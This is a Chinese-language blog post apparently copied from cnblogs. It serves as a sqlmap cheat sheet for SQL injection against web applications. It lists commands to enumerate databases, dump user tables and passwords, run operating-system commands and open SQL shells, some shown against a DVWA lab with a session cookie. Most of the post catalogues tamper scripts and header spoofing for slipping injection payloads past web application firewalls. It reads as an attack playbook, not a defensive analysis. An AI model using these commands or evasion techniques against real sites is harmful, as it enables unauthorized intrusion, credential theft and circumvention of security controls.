sqlmap 绕过WAF

1、基本的语法

sqlmap 更新  sqlmap -update

具体的使用方法:

sqlmap -u url --current-user

sqlmap -u url --current-db

sqlmap -u url --tables -D "db_name"

sqlmap -u url --columns -T "tablename" users -D "db_name" -v 0

sqlmap -u url --dump -C "column_name" -T  "table_name" -D "db_name" -v

sqlmap -u url --privileges -U root

sqlmap -u url --proxy "http://127.0.0.1:8080" 代理注入

sqlmap -u url --SQL-shell

sqlmap -u url  -dump-all -v 0

sqlmap -u url --os-cmd=whoami

sqlmap -u url --tamper 通过编码绕过WAF

sqlmap -u url --technique  指定注入类型

1、1  使用cokire 或者 post作为参数:

  sqlmap.py -u "url " --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1"--current-db

  sqlmap.py -u "url" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa --table
  sqlmap.py -u "url" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa -T users --column
 sqlmap.py -u "url" --cookie="security=low;PHPSESSID=3r6fqg0usr2fl6skonnpqnkes1" -D dvwa -T users -C user,password --dump
 使用  -r参数 提交  HTTP头信息的文本
//读取表中全部字段值
  Sqlmap.py -u “url” -D dvwa -T users --dump‘’
使用宽字节注入:

     POST数据包修改 添加 关键字部分使用 宽字节,比方说  name=121*&submit=%E6%9F%A5%   跑不出来的时候使tapmer

2、绕过WAF

判断是不是安装了 Waf       sqlmap.py -u “http://www.xxx.com” --identify-waf

./sqlmap.py -u http://127.0.0.1/test.php?id=1 -v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”

还有其他的空格替换脚本 space2mssqlblank.py and space2mysqlblank.py

charencode.py andchardoubleencode.py是两个用来打乱编码的tamper脚本,他们在绕过不同的关键词过滤时很有作用。

如果web应用使用asp/asp.net开发,charunicodeencode.pypercentage.py可以帮助你逃避Waf的检测。

空格被过滤可以使用space2comment.py , 过滤系统对大小写敏感可以使用randomcase.py

对应的脚本还有很多,这里我直接导出网上整理好的。

  • 使用方法--tamper xxx.py
  • apostrophemask.py用UTF-8全角字符替换单引号字符
  • apostrophenullencode.py 用非法双字节unicode字符替换单引号字符
  • appendnullbyte.py在payload末尾添加空字符编码
  • base64encode.py 对给定的payload全部字符使用Base64编码
  • between.py分别用“NOT BETWEEN 0 AND #”替换大于号“>”,“BETWEEN # AND #”替换等于号“=”
  • bluecoat.py 在SQL语句之后用有效的随机空白符替换空格符,随后用“LIKE”替换等于号“=”
  • chardoubleencode.py 对给定的payload全部字符使用双重URL编码(不处理已经编码的字符)
  • charencode.py 对给定的payload全部字符使用URL编码(不处理已经编码的字符)
  • charunicodeencode.py 对给定的payload的非编码字符使用Unicode URL编码(不处理已经编码的字符)
  • concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例
  • equaltolike.py 用“LIKE”运算符替换全部等于号“=”
  • greatest.py 用“GREATEST”函数替换大于号“>”
  • halfversionedmorekeywords.py 在每个关键字之前添加MySQL注释
  • ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例
  • lowercase.py 用小写值替换每个关键字字符
  • modsecurityversioned.py 用注释包围完整的查询
  • modsecurityzeroversioned.py 用当中带有数字零的注释包围完整的查询
  • multiplespaces.py 在SQL关键字周围添加多个空格
  • nonrecursivereplacement.py 用representations替换预定义SQL关键字,适用于过滤器
  • overlongutf8.py 转换给定的payload当中的所有字符
  • percentage.py 在每个字符之前添加一个百分号
  • randomcase.py 随机转换每个关键字字符的大小写
  • randomcomments.py 向SQL关键字中插入随机注释
  • securesphere.py 添加经过特殊构造的字符串
  • sp_password.py 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs
  • space2comment.py 用“/**/”替换空格符
  • space2dash.py 用破折号注释符“--”其次是一个随机字符串和一个换行符替换空格符
  • space2hash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
  • space2morehash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符
  • space2mssqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
  • space2mssqlhash.py 用磅注释符“#”其次是一个换行符替换空格符
  • space2mysqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
  • space2mysqldash.py 用破折号注释符“--”其次是一个换行符替换空格符
  • space2plus.py 用加号“+”替换空格符
  • space2randomblank.py 用一组有效的备选字符集当中的随机空白符替换空格符
  • unionalltounion.py 用“UNION SELECT”替换“UNION ALL SELECT”
  • unmagicquotes.py 用一个多字节组合%bf%27和末尾通用注释一起替换空格符
  • varnish.py 添加一个HTTP头“X-originating-IP”来绕过WAF
  • versionedkeywords.py 用MySQL注释包围每个非函数关键字
  • versionedmorekeywords.py 用MySQL注释包围每个关键字
  • xforwardedfor.py 添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF
【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/xinxianquan/p/13893832.html